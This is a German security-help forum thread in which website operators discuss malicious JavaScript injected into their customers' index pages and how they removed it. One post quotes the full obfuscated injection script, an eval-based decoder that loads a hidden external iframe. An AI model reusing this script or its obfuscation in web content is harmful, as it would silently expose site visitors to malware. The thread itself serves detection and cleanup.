|
na dann, wie gesagt, unsichere passwörter, oder dein pc ist infiziert. wenn es noch der selbe code ist, und er nicht geendert wurde, um auf eine neue seite zu verbinden, macht er, wie gesagt nichts, denn bei der analyse hat er auf einen leeren ftp server weitergeleitet. |
Mein FTP Pw ist sicher, habs auch extra nochmal geändert. Wenn jemand den FTP Zugang zu meinem Server (Rechenzentrum) hätte, käönnte er deutlich mehr Schaden anrichten. Aber der Code ist komischerweise nur auf der Seite von einem Kunden drauf. Und der hat nicht mal FTP Zugang. Also habe ich ja XSS getippt, was ich aber programmatisch ausgeschlossen habe. Deswegen bin ich ja verwirrt, dass der Code wieder da war. Naja.. jetzt ist er erstmal weg, aber die Backdoor habe ich noch nicht gefunden. |
Zitat:
Ein Viagra-Spam-Versender hat zum Beispiel doch gar kein Interesse daran, die benutzten Server oder auch Opfer (Ziele) zu stören, der will sein Anliegen durchziehen. Und wenn jemand z.B. Surfer mit Schadcode von einem ukrainischen Server beglücken wollte oder zu illegalen Sites leiten oder locken will, so wäre es kontraproduktiv seinen Lockstandort (deine Seite, vermutlich meinst du aber Site) zu zerstören. |
Moin, mein erster Post, obwohl ich seit Jahren sporadisch hier mitlese. Also höchste Zeit... ;) Den Java-Script-Schadcode hatte ich auch auf einigen Servern, konnte aber über "grep" die infizierten Dateien ausfindig machen und den Code löschen. Seitdem ist Ruhe. Es wurden alle "index.html" und "index.php" infiziert. :wtf: Der Code war folgender und fast immer direkt am Anfang der Datei: Code: <script>try{document.body++}catch(dgsgsdg){zxc=12;ww=window;}if(zxc){try{f=document.createElement("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["9","9","41","3o","16","1e","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1f","4j","d","9","9","9","41","3o","4a","3j","45","3n","4a","1e","1f","27","d","9","9","4l","16","3n","44","4b","3n","16","4j","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4a","3l","29","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","16","4f","41","3m","4c","40","29","1d","1n","1m","1m","1d","16","40","3n","41","3p","40","4c","29","1d","1n","1m","1m","1d","16","4b","4c","4h","44","3n","29","1d","4f","41","3m","4c","40","26","1n","1m","1m","48","4g","27","40","3n","41","3p","40","4c","26","1n","1m","1m","48","4g","27","48","47","4b","41","4c","41","47","46","26","3j","3k","4b","47","44","4d","4c","3n","27","4e","41","4b","41","3k","41","44","41","4c","4h","26","40","41","3m","3m","3n","46","27","44","3n","3o","4c","26","1j","1n","1m","1m","1m","1m","48","4g","27","4c","47","48","26","1m","27","1d","2a","28","1l","41","3o","4a","3j","45","3n","2a","18","1f","27","d","9","9","4l","d","9","9","3o","4d","46","3l","4c","41","47","46","16","41","3o","4a","3j","45","3n","4a","1e","1f","4j","d","9","9","9","4e","3j","4a","16","3o","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41","3o","4a","3j","45","3n","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4b","4a","3l","1d","1i","1d","40","4c","4c","48","26","1l","1l","4d","46","43","46","47","4f","46","3l","47","45","45","4d","4c","3n","1k","4b","4d","1l","41","45","3p","1n","1l","3l","47","4d","46","4c","1k","40","4c","45","1d","1f","27","3o","1k","4b","4c","4h","44","3n","1k","44","3n","3o","4c","29","1d","1j","1n","1m","1m","1m","1m","48","4g","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4e","41","4b","41","3k","41","44","41","4c","4h","29","1d","40","41","3m","3m","3n","46","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","4c","4h","44","3n","1k","48","47","4b","41","4c","41","47","46","29","1d","3j","3k","4b","47","44","4d","4c","3n","1d","27","3o","1k","4b","4c","4h","44","3n","1k","4c","47","48","29","1d","1m","1d","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","4f","41","3m","4c","40","1d","1i","1d","1n","1m","1m","1d","1f","27","3o","1k","4b","3n","4c","2d","4c","4c","4a","41","3k","4d","4c","3n","1e","1d","40","3n","41","3p","40","4c","1d","1i","1d","1n","1m","1m","1d","1f","27","d","9","9","9","3m","47","3l","4d","45","3n","46","4c","1k","3p","3n","4c","2h","44","3n","45","3n","46","4c","4b","2e","4h","36","3j","3p","30","3j","45","3n","1e","1d","3k","47","3m","4h","1d","1f","3d","1m","3f","1k","3j","48","48","3n","46","3m","2f","40","41","44","3m","1e","3o","1f","27","d","9","9","4l"];h=2;s="";if(zxc){for(i=0;i-646!=0;i++){k=i;s+=String["fro"+"mC"+"harCode"](parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}}</script>lg und schönen Sonntag noch, gecko |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 15:32 Uhr. |
Copyright ©2000-2024, Trojaner-Board